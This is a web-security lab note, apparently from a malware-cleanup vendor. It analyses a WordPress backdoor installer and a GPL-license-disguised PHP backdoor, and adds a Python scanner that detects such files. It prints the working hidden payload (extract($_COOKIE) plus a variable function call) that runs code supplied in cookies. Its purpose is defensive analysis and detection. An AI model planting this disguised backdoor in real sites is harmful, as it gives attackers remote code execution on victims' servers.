Straightforward Backdoor Installer

Labs Note

Malware uses encryption, obfuscation and other tricks to prevent its detection so that the compromised sites stay infected for as long as possible. Quite often it’s not easy to spot malicious code even if you see it, especially if you are not a professional programmer or security analyst.

But sometimes, the malware is very straightforward. For example, we found this backdoor installer in a file called robots.php in one WordPress theme. It doesn’t use any encryption, has properly indented code and very clear, descriptive variable names and comments. You shouldn’t think twice when you see such code:

class Searcher
{
    private $backdoor;
...
    private $backdoorName = 'gpl_license.php';
...
    public function __construct($backdoor)
    {
        $this->backdoor = $backdoor;
    }
...
    $this->chooseDirsForBackdoor();
    while ($this->hasUnconfirmedBackdoors()) {
        $this->addBackdoors();
        $this->checkBackdoors();
    };
...

However, this file is only used at the early stages of an infection, when attackers have just gained access to a vulnerable website and managed to upload this file to the server. Then they use this backdoor installer to create multiple backdoors (gpl_license.php in this case) in various directories. That gpl_license.php backdoor is much more obscure and you might even confuse it with a real license file: if you quickly scroll through it, you will only see a real GNU GPL license.

<?php /*            GNU GENERAL PUBLIC LICENSE
                       Version 3, 29 June 2007
...

Only if you carefully inspect the file will you notice that it’s actually a PHP file and the license text is inside a multiline comment. However, inside the license text, there are two short comment breaks that contain PHP code that allows execution of arbitrary code passed in HTTP cookies:

...
giving you */extract($_COOKIE);/* copy, distribute and/or modify it.
...
which are not */@$F&&@$F($A,$B);/*.  For example, Corresponding Source
...
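The trick above relies on PHP executing whatever falls between the comment breaks while a human reader sees only license text. The following scanner is an added example (not Sucuri’s code or the malware’s) that strips /* ... */ comments the way the PHP parser would and flags files that are almost entirely comment yet still execute request-controlled code; the two sample files, their names and the heuristics are constructed for illustration.

```python
import re

# Constructed sample modelled on the gpl_license.php backdoor described above:
# license text inside a block comment, with two short comment breaks holding PHP.
SAMPLE_BACKDOOR = """<?php /*            GNU GENERAL PUBLIC LICENSE
                       Version 3, 29 June 2007
 Copyright (C) 2007 Free Software Foundation, Inc.
 Everyone is permitted to copy and distribute verbatim copies
 of this license document, but changing it is not allowed.
giving you */extract($_COOKIE);/* copy, distribute and/or modify it.
 The precise terms and conditions for copying, distribution and
which are not */@$F&&@$F($A,$B);/*.  For example, Corresponding Source
 for a work in object code form means all the source code needed to
*/
"""

# Constructed benign theme file with a real license header followed by ordinary code.
SAMPLE_BENIGN = """<?php
/* Copyright (C) 2007 Free Software Foundation, Inc.
   This program is free software: you can redistribute it and/or modify
   it under the terms of the GNU General Public License. */
function theme_setup() { add_theme_support('title-tag'); }
"""

BLOCK_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)

# Heuristics: mass assignment from request data, and a variable used as a function name.
SUSPICIOUS = [
    (re.compile(r"extract\s*\(\s*\$_(COOKIE|GET|POST|REQUEST)"), "extract() over request data"),
    (re.compile(r"@?\$[A-Za-z_]\w*\s*\("), "variable function call"),
]

def strip_block_comments(src: str) -> str:
    """Return only the text PHP would actually execute (block comments removed)."""
    return BLOCK_COMMENT.sub("", src)

def comment_ratio(src: str) -> float:
    """Fraction of the file that sits inside /* ... */ comments."""
    commented = sum(len(m.group(0)) for m in BLOCK_COMMENT.finditer(src))
    return commented / len(src) if src else 0.0

def scan_php(src: str) -> dict:
    """Flag a file that looks like a license/comment file yet runs suspicious code."""
    code = strip_block_comments(src)
    findings = [label for pattern, label in SUSPICIOUS if pattern.search(code)]
    ratio = comment_ratio(src)
    # Mostly comment, but the leftover code handles request data: hidden-backdoor shape.
    return {"comment_ratio": round(ratio, 2), "findings": findings,
            "suspicious": ratio > 0.8 and bool(findings)}

if __name__ == "__main__":
    for name, src in (("gpl_license.php", SAMPLE_BACKDOOR), ("functions.php", SAMPLE_BENIGN)):
        print(name, scan_php(src))
```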

These two backdoors, which use completely different approaches to obfuscation, are part of the same attack, which proves that you can never tell what a typical backdoor looks like, or what exactly webmasters should be searching for when we say that they should find and remove all backdoors. Actually, backdoors are the most versatile type of website malware. We have more than a thousand samples of different backdoors and still we find new variations every day. Probably the most efficient way to detect backdoors is file integrity monitoring that reports all added/modified files regardless of the code that was added. If you don’t use such monitoring and want to make sure you didn’t miss any backdoors on your server, you can have us scan your site for thousands of different malware patterns.